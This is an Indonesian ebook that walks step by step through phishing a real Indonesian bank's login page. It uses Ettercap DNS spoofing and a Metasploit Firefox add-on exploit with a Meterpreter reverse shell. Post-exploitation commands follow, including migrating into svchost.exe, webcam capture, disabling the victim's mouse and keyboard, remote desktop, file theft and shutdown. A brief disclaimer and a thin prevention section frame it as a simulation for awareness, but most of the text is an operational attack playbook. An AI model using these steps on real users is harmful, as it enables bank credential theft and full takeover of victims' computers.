Simulasi Penyerangan Phising Dengan MITM Dan Metasploit PDF
Simulasi Penyerangan Phising Dengan MITM Dan Metasploit PDF
METASPLOIT
INDONESIAN BACKTRACK TEAM
Phising adalah suatu bentuk kegiatan penipuan yang dilakukan untuk mendapatkan
informasi penting seperti username, password, PIN dan sebagainya.
Ketika kita sedang melalukan browsing diinternet, kegiatan phising ini sudah tidak
asing lagi. Kenapa? Karna sampai saat ini kegiatan phising masih ada Akibatnya
banyak orang yang kehilangan akun bank miliknya maupun data pribadi tentang
kartu kredit miliknya . Tujuan dari phising ini sangat jelas yakin ingin mencuri data
pribadi korban, entah username atau password korban ataupun identitas kartu kredit
korban .
Disini saya tidak mengajarkan tentang carding maupun phising attack, tetapi saya
hanya memberikan simulasi sederhana dari phising yang banyak orang abaikan
tentang ancaman tersebut . Diluar dari itu saya tidak bertanggung jawab.
MITM adalah singkatan dari MAN IN THE MIDLE ATTACK yang artinya
dimana posisi attacker berada ditengah-tengah korban yang sedang melakukan
percakapan, Si attacker ini mempunyai kemampuan untuk menyadap, mencegat,
mengubah , bahkan mengontrol data / pesan diantara korban yang sedang
melakukan percakapan tersebut.
Untuk lebih jelasnya tentang MITM perhatikan scenario berikut tentang serangan
MITM .
Nah bisa anda bayangkan sekarang betapa bahayanya dari serangan MITM ini .
Di Kali linux atau OS pentest lainnya Metasploit ini sudah terinstall didalamnya .
Bagi yang belum punya metasploit bisa download di http://www.metasploit.com/
II. KASUS
Dalam kasus ini saya akan mensimulasikan penyerangan phising dengan MITM dan
Metasploit.
Disini saya skenariokan Pak Joni adalah salah satu pengusaha migas terbesar diseluruh
ASEAN yang menjabat sebagai Direkur Utama.
Pada suatu hari Pak Joni ingin membeli transportasi darat dan laut di Eropa untuk
keperluan perusahaannya tersebut , Tetapi karna Pak Joni sedang meeting dan pembelian
transportasi tersebut harus cepat dibeli Pak Joni menggunakan system pembelian Online
atau dikenal dengan Online Shop diKantor . Pak Joni melakukan transaksi tersebut
melalui salah satu bank ternama diIndonesia .
Nah setelah Pak Joni melakukan Login ke dalam Internet Banking milik Bank tersebut,
Pak Joni menambah Saldo Rekeningnya dengan mentrasfer Uang dari rekening Bank
yang lainnya ke Rekening tersebut. Beberapa menit kemudian Pak Joni kaget, Karna
Saldo yang ada direkiningnya tersebut habis seketika dan Tiba-tiba laptop Pak Joni hang
dan mati dengan sendirinya .
Berdasarkan scenario diatas saya akan membuat simulasinya bagaimana saldo dari akun
rekeningnya miliknya bisa habis , dan bagaimana tiba-tiba laptopnya bisa mendadak
mati? Ada apa gerangan?
Pertama-tama saya akan membuat halaman phising sederhana yang bertujuan untuk
mengelabuhi si target, sesuai dengan kasusnya saya akan membuat halaman Internet
Banking diIndonesia .
Disana terdapat 3 File dan 1 Folder .
-File index.php adalah Tampilan phising dari salah satu halaman web internet
banking Indonesia .
-File post.php adalah file yang berisi pemograman untuk mendapatkan username dan
password dari halaman phising yang direkam difile logs.txt .
-File logs.txt adalah file yang berisi username dan password korban.
-Dan folder index_files adalah folder yang berisi atribut-atribut lainnya agar halaman
phising yang kita buat sama persis dengan halaman aslinya.
Lalu file-file tersebut saya pindahkan ke dalam web server saya, Untuk dikali linux
lokasi web servernya ada di
Didalam folder /var/www tersebut secara default ada file index.html bawaan dari web
servernya, File tersebut boleh kita hapus atau kita ganti namanya . Agar tidak terjadi
konflik dengan file index.php .
Setelah kita pindahkan semua file phising kita, file-file tersebut belum bisa dieksekusi
karna belum ada hak aksesnya .
Lalu kita beri hak akses file tersebut agar dapat dieksekusi dengan perintah :
Sehingga tampilannya jadi seperti ini yang menandakan bahwa file dan folder kita
sudah diberi hak akses untuk dieksekusi.
Kedua, Setelah file-file phising kita sudah kita persiapkan lalu kita aktifkan service
web server kita . Dikali linux web servernya menggunakan apache , kita aktifkan
apache kali linux dengan perintah :
Jika OK seperti ini berarti service apache berhasil diaktifkan, jika tidak apache kali
linux anda mengalami masalah.
Ketiga, Sampai disini kita lakukan uji coba terlebih dahulu dari phising yang kita
buat.
1. Buka browser anda dan masukan diurl “localhost” atau “127.0.0.1” tanpa tanda
petik.
2. Kita coba isikan USER ID dan PIN , dan setelah berhasil login tersebut akan
dialihkan ke halaman resminya . Ini terserah kita mau dialihkan ke halaman mana saja
tergantu dari kode program phising yang kita buat , dalam hal ini saya alihkan ke
halaman situs aslinya guna untuk mengelabui korban (Pak Jono) .
3. Setelah login, kita cek file logs.txt difolder var/www/ karna file inilah yang
merekam USERID dan PIN tersebut . Dengan perintah “cat logs.txt “ atau bisa juga
dibuka melalui text editor lainnya .
Bisa dilihat digambar diatas berarti halaman phising kita berjalan dengan lancer,
tertulis disana Korban Masuk , USER ID : jonosulityo dan PIN : 123456 . IP
Addressnya dari localhost , Tanggalnya adalah 1 februari 2015 jam 12:50am .
Disini kita baru selesai mengatur halaman phising kita, Kita belum melakukan MITM
dan metasploit lainnya.
Keempat, Kita lakukan serangan MITM dengan tools dari kali linux yaitu Ettercap.
1.Pertama-tama kita harus melakukan konfigurasi ettercap terlebih dahulu.
File yang perlu dikonfigurasi adalah file etter.dns .
Kita ganti Microsoft.com dengan web internet banking yang akan digunakan
sikorban, dalam kasus ini sebagai target saya menggunakan web ibank.klikbca.com.
dan saya ubah IP tersebut dengan IP saya . Dan kita save dengan perintah “ctrl+x” dan
“Y” lalu “enter” .
Perintah ini untuk memberikan nilai 1 atau True kepada ip_forward yang berarti untuk
memberikan perintah aktif pada ip_forward. Untuk mengeceknya lakukan perintah
berikut :
Jika hasilnya 1 berarti sudah aktif dan jika masih 0 lakukan perintah sebelumnya lagi.
Kelima, Sampai disini ettercap sudah bisa dijalankan tetapi kita persiapkan metasploit
dulu . Metasploit ini berguna untuk mendapatkan akses penuh pada Komputer korban
, yang nantinya selain saya mendapatkan USERID dan PIN pak jono saya juga
mendapatkan akses penuh terhadap komputer pak jono . Ibarat kata sambil menyelam
minum air . hehehe
1.Yap, Jalankan dulu metasploit cukup ketikkan perintah “metasploit” tanpa tanda
petik diterimnal .
2. Metode yang saya akan gunakan dengan metasploit ini adalah dengan Addons dari
browser mozila .
Ketikkan pada console metasploit perintah berikut “use
exploit/multi/browser/firefox_xpi_bootstrapped_addon”
3. Ketikkan perintah “show options” untuk melihat opsi yang dibutuhkan .
4. Kemudian kita akan membuat payload atau bisa dibilang virus, nah virus ini adalah
ujung tombak kita untuk mendapatkan akses penuh terhadap komputer korban.
ketikkan diconsole metasploit perintah berikut : “ set PAYLOAD
windows/meterpreter/reverse_tcp “
Kita cek options apa lagi yang masih kita butuhkan dengan perintah : “show options”
Dan ternyata kita masih membutuhkan konfigurasi LHOST pada payload tersebut,
LHOST ini adalah IP kita yang nantinya si payload akan melakukan back connection
atau koneksi balik di komputer korban ke komputer kita.
Saya jelaskan kembali, Jadi ketika pak jono membuka web internet banking tersebut
maka yang pak jono buka adalah halaman phising yang saya buat tadi .
tetapi pak jono tidak bakal curiga, karna url yang dia tuliskan adalah benar alamat dari
internet banking tersebut , karena pak jono sudah terkena serangan MITM saya tadi .
Sehingga yang muncul adalah halaman phising saya .
Lalu Pak Jono memasukkan USERID dan PIN miliknya dan ketika pak jono
mengeklik tombol login yang terjadi adalah pak jono diarahkan ke halaman untuk
menginstall Addon Mozila .
Dan ketika pak jono mengeklik allow maka akan ditampilkan Addon BCA LOGIN
VERIFICATION .
Addon ini tentunya menyakinkan pak tono untuk menginstallnya karna sekilas mata
pak tono tidak curiga bahwa addon ini memang berasal dari pihak bank tersebut . Dan
pak tono pasti beranggapan dengan adanya addon ini transaksi internet banking dia
jadi lebih aman padahal kenyataannya adalah tidak sama sekali .
Sampai disini pak tono berhasil terkena phising dan telah menginstall addon virus
buatan saya. Dan saya mendapatkan USERID dan PIN akun internet bankingnya serta
saya dapat mengontrol komputer pak tono tersebut.
Tentunya pak tono pasti bingung kenapa setelah dia install addon mozilanya tampilan
internet bankingnya tidak muncul? Yang pak tono akan lakukan selanjutkan adalah
membuka kembali halaman internet banking tersebut .
Tapi setelah saya sudah berhasil mendapatkan USERID dan PIN serta Virus saya
sudah masuk ke dalam komputer pak tono tersebut, maka saya hanya perlu
mematikan perintah dari Ettercap yang melakukan MITM tadi.
Jadi ketika pak tono mencoba kembali membuka halaman internet bankingnya yang
akan tampil adalah halaman asli dari pemilik internet banking tersebut.
Disini pak tono melakukan login seperti biasa dan transaksi pada biasanya .
Ketujuh, kita cek file logs.txt dari phising kita tersebut .
Setelah kita cek dan ternyata berhasil terekam USERID dan PIN pak jono , kita
kembali ke metasploit . Kita cek apakah virus kita sudah benar-benar masuk ke
komputer pak jono apa tidak .
Langkah berikutnya adalah saya akan melakukan migrasi untuk virus saya ke proses
program komputer pak jono yang sedang berjalan. Tujuannya adalah agar virus saya
lebih leluasa untuk mengontrol komputer pak jono tersebut , karna pada defaultnya
virus saya masih menempel diaddon browser mozila milik pak jono Jika browser itu
ditutup oleh pak jono maka virus saya akan hilang dan akan menutup sesi pada
komputer saya .
Sebelumnya saya akan mencari proses program untuk melakukan migrasi virus saya.
Dari gambar diatas, saya akan migrasi ke program svchost.exe dengan PID 468 .
svchost.exe ini adalah program yang dijalankan oleh windows, yang sekiranya virus
saya aman nempel diproses ini.
Kedelapan, Setelah virus kita aman dengan melakukan migrasi . Kita tampilkan
perintah-perintah yang ada dimetasploit untuk kegiatan lainnya. Dengan perintah
“help”
Disini saya akan mengecek wajah pak tono dengan webcame milik komputer pak
tono. Saya cek terlebih dahulu apakah komputernya memiliki webcame apa tidak .
maka akan terbuka dibrowser kita gambar dari webcame milik pak tono tersebut.
Hehehe .
lalu selanjutnya apa? Saya akan melihat aktifitas apa yang sedang dikerjakan pak tono
didesktopnya .
Dengan perintah “run vnc”.
dan saya juga bisa menonaktifkan mouse dan keyboard milik pak tono , sehingga pak
tono tidak dapat menggerakkan mouse dan mengetik tulisan dikeyboard.
Dengan perintah “ uictl disable mouse” dan “uictl disable Keyboard” . dan untuk
mengaktifkannya kembali cukup ganti disable dengan enable.
Kurang puas dengan itu, saya juga bisa melakukan remote desktop milik komputer
pak jono. Setelah saya nonaktifkan fungsi keyboard dan mouse milik pak jono , saya
lakukan remote desktop komputernya.
Dengan perintah “run getgui –e” yang tentunya ini akan membuat pak tono bingung
kenapa mousenya bisa bergerak sendiri dan komputernya bisa mengetik sendiri ,
padahal yang menggerakkannya dan yang mengetiknya itu adalah saya.
Dan yang terakhir saya lakukan adalah mematikan komputer pak tono melalui
metasploit ini.
Sampai disini komputer pak tono mendadak mati , dan membuat panik pak tono .
Dengan metasploit ini saya juga dapat mendownload dan mengupload file-file penting
milik pak tono ke komputer saya .
Bisa kita bayangkan sekali lagi, betapa bahayanya dari teknik penyerangan ini .
Bermula dari phising hingga virus yang dapat mengontrol penuh terhadap suatu
komputer .
IV. PENCEGAHAN
Untuk mencegah terjadinya serangan seperti yang sudah saya sampaikan sebelumnya ,
Serangan awal yang terjadi adalah PHISING dari serangan inilah berlanjut ke serangan-
serangan yang lainnya.
1. Kita harus lebih teliti dalam membuka suatu halaman website, apakah website itu web
phising atau tidak Terutama untuk website toko online.
2. Untuk seluruh website internet banking biasanya dipasang fiture ssl , ssl atau Secure
socket layer adalah protokol keamanan yang digunakan pada hampir semua transaksi
aman pada internet.
Dan ketika ada serangan MITM yang sedang melakukan sniffing, maka website yang
memiliki fitur ssl akan menampilkan pesan error sebagai berikut .
4. Untuk serangan dari Metasploit. Cara yang paling aman adalah dengan menginstal
antivirus, karna pada dasarnya metasploit mengenerate virus .
Dan pastikan antivirus yang anda gunakan adalah Antivirus asli bukan bajakan !
V. PENUTUP
Alhamdulillah selesai sudah simulasi penyerangan phising dengan MITM dan Metasploit ,
Terima kasih kepada ALLAH SWT , keluarga , dan teman-teman Indonesian Backtrack
Lainnya yang membantu saya dalam penulisan ebook ini.
Saya tekankan cerita didalam buku ini hanyalah scenario yang saya buat dan hanya untuk
pembelajaran agar kita lebih waspada terhadap serangan didunia maya terutama dalam
melakukan browsing atau transaksi online diinternet sehingga tidak terkena serangan-
serangan yang ada seperti didalam buku ini. Dan saya sebagai penulis mohon buku ini
dipergunakan secara bijaksana.